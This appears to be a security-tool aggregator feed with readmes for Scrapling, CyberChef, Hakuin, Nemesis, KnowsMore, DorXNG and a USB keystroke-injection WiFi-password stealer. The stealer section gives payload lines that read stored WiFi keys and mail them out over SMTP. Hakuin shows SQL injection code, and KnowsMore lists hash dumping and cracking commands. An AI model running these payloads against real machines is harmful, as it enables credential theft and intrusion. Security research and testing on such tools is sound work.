Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❀️ by Karim Shoair.



File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add

By: Unknown


file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively.


Features

  • PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers.

  • Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable.

  • Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine architecture, number of sections, timestamp, subsystem, image base, and section details.

  • File Cleaning: The core functionality of file-unpumper is to remove any "pumped" or padded data from a PE file, resulting in a cleaned version of the executable. This can aid in malware analysis, reverse engineering, or simply reducing the file size.

  • Parallel Processing: To ensure efficient performance, file-unpumper leverages the power of parallel processing using the rayon crate, allowing it to handle large files with ease.

  • Progress Tracking: During the file cleaning process, a progress bar is displayed, providing a visual indication of the operation's progress and estimated time remaining.

Installation

file-unpumper is written in Rust and can be easily installed using the Cargo package manager:

cargo install file-unpumper

Usage

  • <INPUT>: The path to the input PE file.

Options

  • --fix-headers: Fix and align the PE headers of the input file.
  • --extract-resources: Extract embedded resources from the input file.
  • --analyze-metadata: Analyze and display the PE file's metadata.
  • -h, --help: Print help information.
  • -V, --version: Print version information.

Examples

  1. Clean a PE file and remove any "pumped" data:

bash file-unpumper path/to/input.exe

  1. Fix the PE headers and analyze the metadata of a file:

bash file-unpumper --fix-headers --analyze-metadata path/to/input.exe

  1. Extract resources from a PE file:

bash file-unpumper --extract-resources path/to/input.exe

  1. Perform all available operations on a file:

bash file-unpumper --fix-headers --extract-resources --analyze-metadata path/to/input.exe

Contributing

Contributions to file-unpumper are welcome! If you encounter any issues or have suggestions for improvements, please open an issue or submit a pull request on the GitHub repository.

Changelog

The latest changelogs can be found in CHANGELOG.md

License

file-unpumper is released under the MIT License.



CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

By: Unknown


CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


Live demo

CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here - have fun!

Containers

If you would like to try out CyberChef locally you can either build it yourself:

docker build --tag cyberchef --ulimit nofile=10000 .
docker run -it -p 8080:80 cyberchef

Or you can use our image directly:

docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

This image is built and published through our GitHub Workflows

How it works

There are four main areas in CyberChef:

  1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
  2. The output box in the bottom right, where the outcome of your processing will be displayed.
  3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
  4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

You can use as many operations as you like in simple or complex ways. Some examples are as follows:

Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files up to 2GB can be dragged over the input box to load them directly into the browser.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • Automated encoding detection
    • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that make sense of your data, it displays the 'magic' icon in the Output field which you can click to decode your data.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
  • Save and load recipes
    • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
    • You can also copy the URL, which includes your recipe and input, to easily share it with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
  • CyberChef is entirely client-side
    • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

Deep linking

By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

Supported arguments are recipe, input (encoded in Base64), and theme.

Browser support

CyberChef is built to support

  • Google Chrome 50+
  • Mozilla Firefox 38+

Node.js support

CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

Contributing

Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

  • Push your changes to your fork.
  • Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.


Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
...

async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...

if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

ο’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of password (length , lower case, upper case, digit, special and latin)
  • Analyse similarity of password with company and user name
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords like the output bellow

weak passwords by company name similarity +-------+--------------+---------+----------------------+-------+ | top | password | score | company_similarity | qty | |-------+--------------+---------+----------------------+-------| | 1 | company123 | 7024 | 80 | 1111 | | 2 | Company123 | 5209 | 80 | 824 | | 3 | company | 3674 | 100 | 553 | | 4 | Company@10 | 2080 | 80 | 329 | | 5 | company10 | 1722 | 86 | 268 | | 6 | Company@2022 | 1242 | 71 | 202 | | 7 | Company@2024 | 1015 | 71 | 165 | | 8 | Company2022 | 978 | 75 | 157 | | 9 | Company10 | 745 | 86 | 116 | | 10 | Company21 | 707 | 86 | 110 | +-------+--------------+---------+----------------------+-------+ " dir="auto">
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problem with dependency version Check the Virtual ENV file

Execution Flow

There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use the secretsdump to extract ntds hashes with the command bellow

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the command bellow

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to name of your company

Wipe sensitive data

As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about what search engines SearXNG supports See: Configured Engines

Setup ️

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard coded server variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2. This can be changed, or overwritten with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions ο“–

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: -- limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
